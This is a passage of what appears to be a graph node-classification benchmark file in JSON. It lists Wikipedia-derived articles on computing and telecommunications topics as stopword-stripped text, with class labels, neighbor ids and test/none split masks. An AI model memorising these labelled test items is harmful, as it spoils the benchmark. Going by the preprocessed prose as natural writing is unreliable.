      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 2984,
    "label": 3,
    "text": "Mark_Cerny:mark cerny mark evan cerny born august 24 1964 american video game designer programmer producer entertainment executive raised san francisco bay area cerny graduated college preparatory school attended uc berkeley president cerny games founded 1998 acts consultant video game industry 2004 recipient lifetime achievement award international game developers association inducted academy interactive arts sciences hall fame 2010 mid 2010s cerny served lead architect producer sony playstation 4 playstation vita video game consoles cerny fan computer programming arcade games started game industry age 17 joined atari 1982 earlier days professional game development teams small member responsible wider range roles today cerny first major success usually cited marble madness age 18 acted designer co-programmer later worked sega japan united states worked various master system genesis releases notably sonic hedgehog 2 cerny vice president president universal interactive studios worked naughty dog crash bandicoot jak daxter series first uncharted game insomniac games spyro dragon ratchet clank resistance series sony experience dos don'ts game industry developed teaching method game development method prefers free-form pre-production stage explores game viability prior full development example advocates first level produced excite players game idea set aside much effort put international game developers association awarded cerny lifetime achievement award game developers choice awards igda 2004 igda stated rare find 'jack-of-all-trades high-level vision great game design act glue adhere pieces together unusual highly effective methodology brought us entertaining games history described master collaborator crash bandicoot spyro dragon games collectively sold 30 million units 2010 13th annual interactive achievement awards mark cerny inducted academy interactive arts sciences hall fame mark cerny closest come modern-day da vinci said joseph olin then-president aias n't restricted single aspect game creation really renaissance man diversely accomplished game designer producer programmer technologist fluent japanese one foremost western experts japanese game market also one top-level independents business dominated institutions february 20 2013 global playstation 4 unveiling event mark cerny revealed console lead architect showed in-game footage game called knack developed console september 21 2013 cerny revealed lead architect playstation vita 2014 hosted career retrospective former sega game designer yu suzuki game developers conference also hosted shenmue postmortem suzuki discussed shenmue iii",
    "neighbors": [
      9627,
      95
    ],
    "mask": "None"
  },
  {
    "node_id": 2985,
    "label": 4,
    "text": "Middlebox:middlebox middlebox network appliance computer networking device transforms inspects filters otherwise manipulates traffic purposes packet forwarding common examples middleboxes include firewalls filter unwanted malicious traffic network address translators modify packets source destination addresses dedicated middlebox hardware widely deployed enterprise networks improve network security performance however even home network routers often integrated firewall nat middlebox functionality widespread deployment middleboxes network appliances resulted challenges criticism due poor interaction higher layer protocols lixia zhang jonathan b. postel professor computer science university california los angeles coined term middlebox 1999 following examples commonly deployed middleboxes although widely deployed middleboxes generated technical challenges application development controversy regarding impact middleboxes interfere application functionality restricting preventing end host applications performing properly network address translators present challenge nat devices divide traffic destined public ip address across several receivers connections host internet host behind nat initiated host behind nat nat learns traffic connection belongs local host thus traffic coming internet destined public shared address particular port nat direct traffic appropriate host however connections initiated host internet present nat opportunity learn internal host connection belongs moreover internal host may even know public ip address announce potential clients address connect resolve issue several new protocols proposed common middlebox-induced application challenges include web proxies serving stale date content firewalls rejecting traffic desired ports one criticism middleboxes limit choice transport protocols thus placing limits application service designs middleboxes may filter drop traffic conform expected behaviors new uncommon protocols protocol extensions may filtered middleboxes conversely certain types middlebox assist protocol deployment providing translation new old protocols ipv6 example deployed public endpoints load balancers proxies forms nat backend traffic routed ipv4 ipv6 generally middleboxes considered violate end-to-end principle computer system design",
    "neighbors": [
      836,
      7972,
      8998,
      2985,
      939,
      2093,
      7214,
      112,
      3792,
      5490,
      4084,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 2986,
    "label": 7,
    "text": "Diskless_shared-root_cluster:diskless shared-root cluster diskless shared-root cluster way manage several machines time instead operating system os local disk one image os available server nodes use image ssi cluster single-system image simplest way achieve use nfs server configured host generic boot image ssi cluster nodes pxe dhcp tftp nfs ensure single point failure nfs export boot-image hosted two node cluster architecture diskless computer cluster makes possible separate servers storage array operating system well actual reference data userfiles databases websites stored competitively attached storage system centralized manner server acts cluster node easily exchanged demand additional abstraction layer storage system computing power eases scale infrastructure notably storage capacity computing power network bandwidth scaled independent one another similar technology found vmscluster openvms trucluster tru64 unix open-source implementation diskless shared-root cluster known open-sharedroot",
    "neighbors": [
      7649,
      7812,
      9285,
      10733,
      10926,
      7983,
      118
    ],
    "mask": "Test"
  },
  {
    "node_id": 2987,
    "label": 3,
    "text": "Task_state_segment:task state segment task state segment tss special structure x86-based computers holds information task used operating system kernel task management specifically following information stored tss information stored specific locations within tss specified ia-32 manuals tss may reside anywhere memory special segment register called task register tr holds segment selector points valid tss segment descriptor resides gdt tss descriptor may reside ldt therefore use tss following must done operating system kernel security purposes tss placed memory accessible kernel tr register 16-bit register holds segment selector tss may loaded ltr instruction ltr privileged instruction acts manner similar segment register loads task register two parts portion visible accessible programmer invisible one automatically loaded tss descriptor tss may contain saved values x86 registers used task switching operating system may load tss values registers new task needs executing hardware task switch iret instruction x86 cpu load saved values tss appropriate registers note modern operating systems windows linux use fields tss implement software task switching note hardware task switch certain fields old tss updated cpu current register contents values new tss read thus tss fields read/write others read-only codice_22 field fact first one read new tss since hardware task switch also switch completely different page table mapping fields especially codice_23 relative new mapping tss contains 16-bit pointer i/o port permissions bitmap current task bitmap usually set operating system task started specifies individual ports program access i/o bitmap bit array port access permissions program permission access port 0 stored corresponding bit index program permission 1 stored tss ’ segment limit less full bitmap missing bits assumed 1 feature operates follows program issues x86 i/o port instruction see x86 instruction listings note byte- word- dword-length versions hardware i/o privilege level iopl check see program access i/o ports cpl program numerically greater iopl program less-privileged iopl specifies program i/o port access ports hardware check i/o permissions bitmap tss see program access specific port instruction relevant bit i/o port permissions bitmap is/are clear program allowed access port instruction allowed execute relevant bit is/are set bit is/are past tss ’ segment limit program access processor generates general protection fault feature allows operating systems grant selective port access user programs tss contains 6 fields specifying new stack pointer privilege level change happens field ss0 contains stack segment selector cpl=0 field esp0/rsp0 contains new esp/rsp value cpl=0 interrupt happens protected 32-bit mode x86 cpu look tss ss0 esp0 load values ss esp respectively allows kernel use different stack user program also stack unique user program new feature introduced amd64 extensions called interrupt stack table ist also resides tss contains logical segment+offset stack pointers interrupt descriptor table specifies ist entry use 8 processor load new stack ist instead allows known-good stacks used case serious errors nmi double fault example previously entry exception interrupt idt pointed task gate causing processor switch task pointed task gate original register values saved tss current time interrupt exception occurred processor set registers including ss esp known value specified tss saved selector previous tss problem hardware task switching supported amd64 16-bit selector allows linking tss previous one used hardware task switching see ia-32 manuals details although tss could created task running computer linux kernel creates one tss cpu uses tasks approach selected provides easier portability architectures example amd64 architecture support hardware task switches improved performance flexibility linux uses i/o port permission bitmap inner stack features tss features needed hardware task switches linux kernel use x86 exception vector 10 called invalid tss exception ts issued processor whenever something goes wrong tss access example interrupt happens cpl=3 transferring control cpl=0 tss used extract ss0 esp0/rsp0 stack switch task register holds bad tss selector ts fault generated invalid tss exception never happen normal operating system operation always related kernel bugs hardware failure details tss exceptions see volume 3a chapter 6 ia-32 manual x86-64 architecture support hardware task switches however tss still used machine running 64 bit extended modes modes tss still useful stores also task register expanded modes able hold 64-bit base address",
    "neighbors": [
      5380,
      9911,
      6730,
      9547,
      5356,
      6797,
      7983,
      7218,
      499,
      6868,
      823,
      1848,
      1915,
      1660,
      6078
    ],
    "mask": "None"
  },
  {
    "node_id": 2988,
    "label": 1,
    "text": "British_and_Irish_Legal_Information_Institute:british irish legal information institute british irish legal information institute bailii pronounced bailey provides legal information especially reports cases decided courts united kingdom generally decisions england wales ireland northern ireland scotland european union european court human rights put online partial online database british irish legislation case law law reform reports treaties legal scholarship traditionally legal information accessible law report usually written private individuals groups court judgments official reports recently historically court judgment would simply spoken publication precedents built depended record interested third parties year books recorded judgments 1268 1535 probably compiled law students people like judge sir edward coke 1572 1615 created series reports would necessarily accurate record said recorded might selective inaccurate reporting industry developed people became involved specialised particular areas law incorporated council law reporting created 1885 released copies various cases still could gaps reporting however advent internet possible access multiple databases fee online particularly westlaw lexis however freely available source yet made bailii set long hard campaign various activists including senior members society computers law then-chairman neil cameron barrister laurie west-knights qc lord saville lord justice brooke concerned lack availability court judgments ordinary court users inspired australasian legal information institute austlii lii aim provide free access publicly available legal information 2006 bailii included 5 jurisdictions fourteen databases bailii website jointly hosted institute advanced legal studies university london university college cork law school bailii uses neutral citation method quickly adopted standard citation cases different series cases bailii produces follows bailii received criticisms due restrictions imposes usage guardian editorial noted bailii done wonderful job making case law freely accessible lawyers including historic european data otherwise difficult find however also noted small charity service struggles afford host 297,000 judgments allow search engines index instances even clear whether crown judge concerned holds copyright words reproducing site forbidden organization known judgmental established scrape information bailii make indexable search engines founding members judgmental included francis irving one developers theyworkforyou judgmental shut threat legal action regarding court records libel case former bailii chairman henry brooke defended criticisms stating restrictions indexing ensure records could retroactively edited removed clerical legal reasons errors information authorized published records properly anonymized brooke went explain bailii consider taking extra step making judgments searchable using google search engines necessary order achieve primary objective making judgments courts freely available public also stated restriction redistribution protect value-added content converting suitable format making efforts prevent publication material must published much material available bailii duplicated elsewhere example legislation rulings courts supreme court bailii agreement ministry justice indemnifying legal prosecutions bailii historically received payment part contract 2010/2011 tax year bailii received part contract",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2989,
    "label": 5,
    "text": "Modified_AMI_code:modified ami code modified ami codes digital telecommunications technique maintain system synchronization alternate mark inversion ami line codes modified deliberate insertion bipolar violations several types modified ami codes used various t-carrier e-carrier systems clock rate incoming t-carrier extracted bipolar line code signal transition provides opportunity receiver see transmitter clock ami code guarantees transitions always present mark 1 bit missing adjacent spaces 0 bits prevent loss synchronization long string zeros present payload deliberate bipolar violations inserted line code create sufficient number transitions maintain synchronization form run length limited coding receive terminal equipment recognizes bipolar violations removes user data marks attributable bipolar violations t-carrier originally developed voice applications voice signals digitized transmission via t-carrier data stream always includes ample 1 bits maintain synchronization help μ-law algorithm digitizing voice signals encodes silence continuous stream 1 bits however used transmission digital data conventional ami line code may fail sufficient marks permit recovery incoming clock synchronization lost happens many consecutive zeros user data transported exact pattern bipolar violations transmitted given case depends line rate i.e level line code t-carrier hierarchy polarity last valid mark user data prior unacceptably long string zeros would useful violation immediately following mark would produce transition reason modified ami codes include space 0 bit violation mark descriptions b denotes balancing mark opposite polarity preceding mark v denotes bipolar violation mark polarity preceding mark order preserve ami coding desirable absence dc bias number positive marks must equal number negative marks happens automatically balancing b marks line code must ensure positive negative violation marks balance first technique used ensure minimum density marks zero code suppression form bit stuffing set least significant bit 8-bit byte transmitted 1 bit already unavailable due robbed-bit signaling avoided need modify ami code way limited available data rates 56,000 bits per second per ds0 voice channel also low minimum density ones 12.5 sometimes led increased clock slippage span increased demand bandwidth compatibility g.703 isdn pri standards called 64,000 bits per second led system superseded b8zs commonly used north american t1 digital signal 1 1.544 mbit/s line code bipolar eight-zero substitution b8zs replaces string 8 consecutive zeros special pattern 000vb0vb depending polarity preceding mark could 000+−0−+ 000−+0+− north american t2 rate 6.312 mbit/s bipolar violations inserted 6 consecutive zeros occur line code called bipolar six-zero substitution b6zs replaces 6 consecutive zeros pattern 0vb0vb depending polarity preceding mark could 0+−0−+ 0−+0+− used levels european e-carrier system high density bipolar order 3 hdb3 code replaces instance 4 consecutive 0 bits one patterns 000v b00v choice made ensure consecutive violations differing polarity i.e. separated odd number normal − marks rules applied code built original string every time 4 consecutive zeros code replaced either 000− 000+ +00+ −00− determine pattern use one must count number pluses number minuses − since last violation bit v subtract one result odd number 000− 000+ used result even number +00+ −00− used determine polarity use one must look pulse preceding four zeros 000v form must used v simply copies polarity last pulse b00v form must used b v chosen opposite polarity last pulse examples bit streams codes ami hdb3 assume starting conditions previous 1 bit − previous violation even number 1 bits ago e.g preceding bits could ++− north american t3 rate 44.736 mbit/s bipolar violations inserted 3 consecutive zeros occur line code called bipolar three-zero substitution b3zs similar hdb3 run 3 consecutive zeros replaced 00v b0v choice made ensure consecutive violations differing polarity i.e separated odd number normal b marks line codes 3 states",
    "neighbors": [
      8192,
      4963,
      7108,
      2920,
      7400,
      7855,
      10833,
      7698,
      3156,
      2968,
      8287
    ],
    "mask": "Test"
  },
  {
    "node_id": 2990,
    "label": 7,
    "text": "BisQue_(Bioimage_Analysis_and_Management_Platform):bisque bioimage analysis management platform bisque free open source web-based platform exchange exploration large complex datasets developed vision research lab university california santa barbara bisque specifically supports large scale multi-dimensional multimodal-images image analysis metadata stored arbitrarily nested linked tag/value pairs allowing domain-specific data organization image analysis modules added perform complex analysis tasks compute clusters analysis results stored within database querying processing data analysis provenance maintained reproducibility results bisque easily deployed cloud computing environments computer clusters scalability bisque integrated nsf cyberinfrastructure project cyverse user interacts bisque via modern web browser project bisque originally started 2004 part us national science foundation nsf supported center bio-image informatics ucsb facilitate integration database image analysis methods specifically context microscopy images given diversity imaging equipment image formats urgent need access multiple formats uniform way importantly also need maintaining analysis provenance reproducing image analysis results early realized bisque go schema-less support needs diverse biological experiments—each experiment analysis results unique slightly different beginning bisque focused using web browser standard interface posed unique database visualization challenges dealing large scale multimodal data process bisque developed unique novel framework visualizing large images 100k x 100k pixels example currently supports 250 different image file formats within browser users visualize 2d 3d 4d 5d images export many standardized formats years bisque team closely worked iplant cyberinfrastructure cyverse supporting image database management needs plant biology community going beyond bioimaging applications bisque used analyzing underwater images video ref medical imaging applications current bisque interface supports latest dicom standard bisque integrated 100 different image features feature service next release include support deep learning methods feature classification services bisque provides online resource management analysis 5d biological images addition image collection management system facilitates common biological workflows typical biological images imaging experimental annotation repeated analysis presentation images results image metadata ingestion first step using bisque ingestion either happen web browser-based interface via bisque api date bisque supports 240 different image formats generic jpeg specialized microscopy image formats zeiss czi imaris ims nikon nd2 images arbitrarily large automatically pyramided ingestion guarantees fluent user experience panning zooming image viewer addition image data bisque also captures metadata image e.g. camera settings geo coordinates etc attaches image tags images metadata organized tags name–value pairs associated image bisque allows arbitrary number tags per resource arbitrary nesting tags similar xml documents provides flexible way managing information tailored needs underlying imaging project efficiency reliability tags values stored indexed tag/value table underlying sql database graphical annotations stored addition tags include simple objects points lines circles complex objects region outlines graphical objects stored indexed underlying database well addition searchable graphical annotation also rendered bisque image viewer overlays top viewed image users typically locate images interest browsing collections searching specific queries former bisque provides web-based tag organizer enables rapid filtering grouping large image collections tag names values latter bisque offers restful tag query interface find images specific tag values search capabilities converted sql queries tag/value table behind scenes besides tag-centric image organization bisque also provides traditional folder view allows users browse images navigating folders similar file manager bisque allows users write analysis modules programming language choice e.g. matlab python c++ using language-specific apis modules typically read images metadata generate new images additional metadata output results stored back system form tags graphical objects and/or images images metadata never over-written order preserve complete provenance information tested modules registered bisque system execution bisque supports different execution modes depending available infrastructure simple modules bisque execute single node high-performance needs bisque leverage htcondor high-throughput computing software framework coarse-grained distributed parallelization latter case bisque automatically parallelize analysis large image datasets collect results single bisque metadata document metadata bisque take many forms text objects interest user annotations another web-based file e.g associated publication pdf textual graphical markup viewing editing available web 5d image viewer viewer used image object browsing ground-truth acquisition statistical summaries biological objects additionally allows various visualization options channel mapping image enhancement projections rotations recent image viewer able present volumetric imagery 3d without browser plug-ins utilizing modern browsers webgl capabilities biological image sharing often difficult due proprietary formats bisque sharing images metadata analysis results performed web system contains export facility allows conversions image formats application variety image-processing operations export textual graphical annotations xml csv google docs services modules accessible via standard web access methods http permits wide variety tools web browsers custom analysis applications interact bisque bisque services implemented using restful design pattern architecture exposes resources uris resources manipulated using common http methods among many benefits attributed restful pattern scalability web caches use client side state processing resources bisque services exchange data xml format easy integration existing software bisque also provides api covers aspects resource ingestion search analysis manipulation currently available python matlab bisque used manage analyze 23.3 hours 884gb high definition video dives bering sea submarine canyons evaluate density fishes structure-forming corals sponges document describe fishing damage non-overlapping frames extracted video transect constant frequency 1 frame per 30s image processing algorithm developed matlab used detect laser dots projected onto seafloor scale reference bisque module system allows wrap matlab code analysis module parallelized across compute cluster addition frame manually annotated objects interest e.g. fishes sponges substrates annotations image metadata e.g. pixel resolution gps location stored bisque flexible metadata store annotations used compute average density species co-habitation behavior different regions canyons resulting new insights ecosystem bisque platform part iplant cyberinfrastructure cyverse analyze plant-related images context phenotype analysis bisque integrated iplant ’ authentication cloud storage high-performance grid computing infrastructure configured sample data algorithms designed assay phenotypes directional root-tip growth comparisons seed size differences version 0.5.5 bisque released modified bsd license requires proper visible attribution bisque project whole parts bisque used either research commercial purposes",
    "neighbors": [
      5956,
      3462,
      9320,
      8554,
      6797,
      10413,
      7983,
      8627,
      2901,
      11126,
      823,
      2651,
      8446,
      7326,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2991,
    "label": 8,
    "text": "Axia_NetMedia:axia netmedia axia netmedia designs operates wholesale component several open access fibre based internet data networks axia operates alberta supernet half owner covage networks developing high speed networks france also awarded tender singapore fibre network part opennet consortium singapore telecom placed bond allow submit proposal australia national broadband network axia market cap 160m october 2014 axia member public-private partnership constructed alberta supernet—a provincial layer 3 network connects public facilities rural communities across alberta network wholesale sales managed axia built bell canada owned alberta government june 29 2018 service alberta announced declined renew contract axia reached multi-year deal bell assume operations supernet bell canada subsequently announced following monday agreed acquire axia alberta assets covage french joint venture axia netmedia cube infrastructure fund €1.1 million private equity fund direct involvement 40 regional networks france national backbone 9,000 km fiber deployed covage leading neutral independent player optic fiber concession business france opennet consortium consisting axia netmedia 30 singapore telecommunications/singtel 30 singapore press holdings 25 singapore power telemedia 15 awarded singapore national broadband network passive network tender september 26 2008 opennet directly fibre links proposal reach 60 population 2010 95 2012 opennet assume universal service obligations 2013 proposal creates open access network 4 distinct layers ownership separate competitive interests monopoly aspects network singtel national incumbent transfer existing ducts manholes exchanges used nbn independent asset company mid-2011 sell stake entity 2014 fibre belong opennet electronics offered operating companies opco licensees operate electronics—layers 2 3— network operating companies resell retail providers axia netmedia submitted bid build australia national broadband network nbn nbn request proposal involved design operation open access nationwide network delivering speeds 12mbit/s higher 98 australia population rfp terminated australian government april 7 2009",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2992,
    "label": 5,
    "text": "Multiplex_baseband:multiplex baseband telecommunication term multiplex baseband following meanings example output group multiplexer consists band frequencies 60 khz 108 khz group-level baseband results combining 12 voice-frequency input channels bandwidth 4 khz including guard bands turn 5 groups multiplexed super group baseband 312 khz 552 khz baseband however represent group-level baseband ten super groups turn multiplexed one master group output baseband may used modulate microwave-frequency carrier",
    "neighbors": [
      7490,
      1967
    ],
    "mask": "Test"
  },
  {
    "node_id": 2993,
    "label": 2,
    "text": "Lenovo_P2:lenovo p2 lenovo p2 android smartphone focused battery life developed lenovo officially announced september 3 2016 ifa show held berlin released november 2016 successor lenovo vibe p1 device available graphite grey champagne gold colour variants one devices 5000+ mah battery super slim full-metal unibody design terms specifications device sports 5.5-inch full hd super amoled display 1920 x 1080 resolution 401ppi powered 14 nm 2 ghz 64-bit octa-core qualcomm snapdragon 625 msm8953 processor paired 3gb 4gb ram lenovo p2 includes internal storage 32gb expanded 128gb via microsd card two nano sim card slots one slot used sim second slot used either sim sd card smartphone equipped 13mp pdaf rear camera sony sensor led flash 5mp front facing camera selfie device includes nfc usb otg fm radio a-gps bluetooth v4.1 wi-fi 802.11 a/b/g/n/ac wifi hotspot connectivity featured sensors accelerometer proximity sensor ambient light sensor compass gyroscope always active fingerprint scanner also offers gestures etc lenovo p2 launched android 6.0.1 marshmallow rom released year p2 release april 2017 p2 officially received android 7.0 nougat update 2gb size update via ota air update update brings features split-screen new notification control data saver security updates latest android security patch level november 1 2017 build number p2a42_s251_171107_row powered 5100 mah battery one highest-capacity batteries class give three days battery backup normal use physical power saver switch extends battery life reverse charging feature phone works 24w quick charger rapidly charge battery rapid charge function utilized phone turned completely comes pre-installed apps google maps hangouts play music play movies youtube gmail news weather photos drive chrome play store sar values smartphone",
    "neighbors": [
      10658,
      5963,
      1776,
      2259,
      9913,
      1083,
      9244,
      798
    ],
    "mask": "None"
  },
  {
    "node_id": 2994,
    "label": 5,
    "text": "Multiplexing:multiplexing telecommunications computer networks multiplexing sometimes contracted muxing method multiple analog digital signals combined one signal shared medium aim share scarce resource example telecommunications several telephone calls may carried using one wire multiplexing originated telegraphy 1870s widely applied communications telephony george owen squier credited development telephone carrier multiplexing 1910 multiplexed signal transmitted communication channel cable multiplexing divides capacity communication channel several logical channels one message signal data stream transferred reverse process known demultiplexing extracts original channels receiver end device performs multiplexing called multiplexer mux device performs reverse process called demultiplexer demux dmx inverse multiplexing imux opposite aim multiplexing namely break one data stream several streams transfer simultaneously several communication channels recreate original data stream computing i/o multiplexing also used refer concept processing multiple input/output events single event loop system calls like poll select unix multiple variable bit rate digital bit streams may transferred efficiently single fixed bandwidth channel means statistical multiplexing asynchronous mode time-domain multiplexing form time-division multiplexing digital bit streams transferred analog channel means code-division multiplexing techniques frequency-hopping spread spectrum fhss direct-sequence spread spectrum dsss wireless communications multiplexing also accomplished alternating polarization horizontal/vertical clockwise/counterclockwise adjacent channel satellite phased multi-antenna array combined multiple-input multiple-output communications mimo scheme wired communication space-division multiplexing also known space-division multiple access use separate point-to-point electrical conductors transmitted channel examples include analogue stereo audio cable one pair wires left channel another right channel multi-pair telephone cable switched star network telephone access network switched ethernet network mesh network wireless communication space-division multiplexing achieved multiple antenna elements forming phased array antenna examples multiple-input multiple-output mimo single-input multiple-output simo multiple-input single-output miso multiplexing ieee 802.11g wireless router k antennas makes principle possible communicate k multiplexed channels peak bit rate 54 mbit/s thus increasing total peak bit rate factor k different antennas would give different multi-path propagation echo signatures making possible digital signal processing techniques separate different signals techniques may also utilized space diversity improved robustness fading beamforming improved selectivity rather multiplexing frequency-division multiplexing fdm inherently analog technology fdm achieves combining several signals one medium sending signals several distinct frequency ranges single medium fdm signals electrical signals one common applications fdm traditional radio television broadcasting terrestrial mobile satellite stations cable television one cable reaches customer residential area service provider send multiple television channels signals simultaneously cable subscribers without interference receivers must tune appropriate frequency channel access desired signal variant technology called wavelength-division multiplexing wdm used optical communications time-division multiplexing tdm digital rare cases analog technology uses time instead space frequency separate different data streams tdm involves sequencing groups bits bytes individual input stream one way associated appropriate receiver done sufficiently quickly receiving devices detect circuit time used serve another logical communication path consider application requiring four terminals airport reach central computer terminal communicated 2400 baud rather acquire four individual circuits carry low-speed transmission airline installed pair multiplexers pair 9600 baud modems one dedicated analog communications circuit airport ticket desk back airline data center also installed web proxy servers e.g polipo use tdm http pipelining multiple http transactions onto tcp/ip connection carrier sense multiple access multidrop communication methods similar time-division multiplexing multiple data streams separated time medium signals separate origins instead combined single signal best viewed channel access methods rather form multiplexing td legacy multiplexing technology still providing backbone national fixed line telephony networks europe providing 2m/bit voice signalling ports narrow band telephone exchanges dms100 e1 2m/bit tdm port provides either 30 31 speech timeslots case ccitt7 signalling systems 30 voice channels customer connected q931 dass2 dpnss v5 cass signalling systems polarization-division multiplexing uses polarization electromagnetic radiation separate orthogonal channels practical use radio optical communications particularly 100 gbit/s per channel fiber optic transmission systems orbital angular momentum multiplexing relatively new experimental technique multiplexing multiple channels signals carried using electromagnetic radiation single path potentially used addition physical multiplexing methods greatly expand transmission capacity systems still early research phase small-scale laboratory demonstrations bandwidths 2.5 tbit/s single light path controversial subject academic community many claiming new method multiplexing rather special case space-division multiplexing code division multiplexing cdm code division multiple access cdma spread spectrum class techniques several channels simultaneously share frequency spectrum spectral bandwidth much higher bit rate symbol rate one form frequency hopping another direct sequence spread spectrum latter case channel transmits bits coded channel-specific sequence pulses called chips number chips per bit chips per symbol spreading factor coded transmission typically accomplished transmitting unique time-dependent series short pulses placed within chip times within larger bit time channels different code transmitted fiber radio channel medium asynchronously demultiplexed advantages conventional techniques variable bandwidth possible statistical multiplexing wide bandwidth allows poor signal-to-noise ratio according shannon-hartley theorem multi-path propagation wireless communication combated rake receivers significant application cdma global positioning system gps multiplexing technique may extended multiple access method channel access method example tdm time-division multiple access tdma statistical multiplexing carrier-sense multiple access csma multiple access method makes possible several transmitters connected physical medium share capacity multiplexing provided physical layer osi model multiple access also involves media access control protocol part data link layer transport layer osi model well tcp/ip model provides statistical multiplexing several application layer data flows to/from computer code-division multiplexing cdm technique channel transmits bits coded channel-specific sequence pulses coded transmission typically accomplished transmitting unique time-dependent series short pulses placed within chip times within larger bit time channels different code transmitted fiber asynchronously demultiplexed widely used multiple access techniques time-division multiple access tdma frequency-division multiple access fdma code-division multiplex techniques used access technology namely code-division multiple access cdma universal mobile telecommunications system umts standard third-generation 3g mobile communication identified itu earliest communication technology using electrical wires therefore sharing interest economies afforded multiplexing electric telegraph early experiments allowed two separate messages travel opposite directions simultaneously first using electric battery ends one end telephony customer telephone line typically ends remote concentrator box multiplexed along telephone lines neighborhood similar area multiplexed signal carried central switching office significantly fewer wires much distances customer line practically go likewise also true digital subscriber lines dsl fiber loop fitl common method multiplexing uses optical fiber backbone connects pots phone lines rest pstn also replaces dsl connecting directly ethernet wired home asynchronous transfer mode often communications protocol used cable tv long carried multiplexed television channels late 20th century began offering services telephone companies iptv also depends multiplexing video editing processing systems multiplexing refers process interleaving audio video one coherent data stream digital video transport stream normally feature container format may include metadata information subtitles audio video streams may variable bit rate software produces transport stream and/or container commonly called statistical multiplexer muxer demuxer software extracts otherwise makes available separate processing components stream container digital television systems several variable bit-rate data streams multiplexed together fixed bitrate transport stream means statistical multiplexing makes possible transfer several video audio channels simultaneously frequency channel together various services may involve several standard definition television sdtv programmes particularly dvb-t dvb-s2 isdb atsc-c one hdtv possibly single sdtv companion channel one 6 8 mhz-wide tv channel device accomplishes called statistical multiplexer several systems multiplexing results mpeg transport stream newer dvb standards dvb-s2 dvb-t2 capacity carry several hdtv channels one multiplex digital radio multiplex also known ensemble number radio stations grouped together multiplex stream digital information includes audio data communications satellites carry broadcast television networks radio networks known multiple channel per carrier mcpc multiplexing practical different sources using single transponder single channel per carrier mode used fm broadcasting analog radio media multiplexing term commonly given process adding subcarriers audio signal enters transmitter modulation occurs fact stereo multiplex signal generated using time-division multiplexing switching two left channel right channel input signals ultrasonic rate subcarrier filtering higher harmonics multiplexing sense sometimes known mpx turn also old term stereophonic fm seen stereo systems since 1960s spectroscopy term used indicate experiment performed mixture frequencies respective response unravelled afterwards using fourier transform principle computer programming may refer using single in-memory resource file handle handle multiple external resources on-disk files electrical multiplexing techniques require physical multiplexer device refer keyboard matrix charlieplexing design style high-throughput dna sequencing term used indicate artificial sequences often called barcodes indexes added link given sequence reads given sample thus allow sequencing multiple samples reaction",
    "neighbors": [
      8192,
      520,
      2057,
      1550,
      1556,
      5664,
      7723,
      10799,
      10809,
      1083,
      64,
      3140,
      6213,
      9296,
      10833,
      3156,
      1631,
      3168,
      1121,
      6247,
      6253,
      1650,
      3187,
      4725,
      119,
      6267,
      10381,
      6290,
      11413,
      9887,
      3754,
      10924,
      7341,
      5809,
      5815,
      5304,
      7865,
      10429,
      8386,
      5321,
      6857,
      2787,
      7400,
      2802,
      5368,
      9987,
      3847,
      10508,
      1320,
      2860,
      9006,
      1839,
      1332,
      7478,
      3383,
      11065,
      7490,
      11591,
      7498,
      2383,
      5457,
      6993,
      853,
      2912,
      9057,
      4963,
      1893,
      2920,
      3959,
      5505,
      408,
      8600,
      2458,
      5020,
      11686,
      6567,
      7596,
      11181,
      1967,
      1969,
      1977,
      448,
      7108,
      1478,
      10696,
      979,
      3040,
      8160,
      4068,
      5092,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 2995,
    "label": 2,
    "text": "UNIX_System_V:unix system v unix system v pronounced system five one first commercial versions unix operating system originally developed first released 1983 four major versions system v released numbered 1 2 3 4 system v release 4 svr4 commercially successful version result effort marketed unix system unification solicited collaboration major unix vendors source several common commercial unix features system v sometimes abbreviated sysv unix market divided five system v variants ibm aix hewlett-packard hp-ux oracle solaris xinuos unixware illumos distributions open-source opensolaris continuation system v successor 1982 unix system iii developed sold hardware ran system v customers ran version reseller based reference implementation standards document called system v interface definition outlined default features behavior implementations formative years computer business division went several phases system v software groups beginning unix support group usg followed unix system development laboratory usdl followed information systems attis finally unix system laboratories usl 1980s early-1990s unix system v berkeley software distribution bsd two major version unix historically bsd also commonly called bsd unix berkeley unix eric s. raymond summarizes longstanding relationship rivalry system v bsd early period hp ibm others chose system v basis unix offerings vendors sun microsystems dec extended bsd throughout development though system v infused features bsd bsd variants dec ultrix received system v features sun microsystems worked together merge system v bsd-based sunos produce solaris one primary system v descendants still use today since early 1990s due standardization efforts posix commercial success linux division system v bsd become less important system v known inside bell labs unix 5.0 succeeded previous commercial unix called system iii january 1983 unix 4.0 never released externally would designated system iv first release system v called system v.0 system v release 1 svr1 developed unix support group usg based bell labs internal usg unix 5.0 system v also included features vi editor curses 4.1 bsd developed university california berkeley also improved performance adding buffer inode caches also added support inter-process communication using messages semaphores shared memory developed earlier bell-internal cb unix svr1 ran dec pdp-11 vax minicomputers unix support group usg transformed unix system development laboratory usdl released system v release 2 1984 svr2 added shell functions svid svr2.4 added demand paging copy-on-write shared memory record file locking concept porting base formalized dec vax-11/780 chosen release porting base so-called original version release porting efforts machines emanate educational source licenses svr2 offered us 800 first cpu 400 additional cpu commercial source license offered 43,000 three months support 16,000 price per additional cpu apple computer a/ux operating system initially based release sco xenix also used svr2 basis first release hp-ux also svr2 derivative maurice j. bach book design unix operating system definitive description svr2 kernel unix system development laboratory usdl succeeded information systems attis distributed unix system v release 3 1987 svr3 included streams remote file sharing rfs file system switch fss virtual file system mechanism restricted form shared libraries transport layer interface tli network api final version release 3.2 1988 added binary compatibility xenix intel platforms see intel binary compatibility standard user interface improvements included layers windowing system dmd 5620 graphics terminal svr3.2 curses libraries offered eight color pairs time important features forms panels menus etc. 3b2 became official porting base sco unix based upon svr3.2 isc 386/ix among obscure distributions svr3.2 386 esix 3.2 everex system v release 3.2 sold intel two shipped plain vanilla codebase ibm aix operating system svr3 derivative system v release 4.0 announced october 18 1988 incorporated variety commercial unix products early 1989 onwards joint project unix system laboratories sun microsystems combined technology new features included many 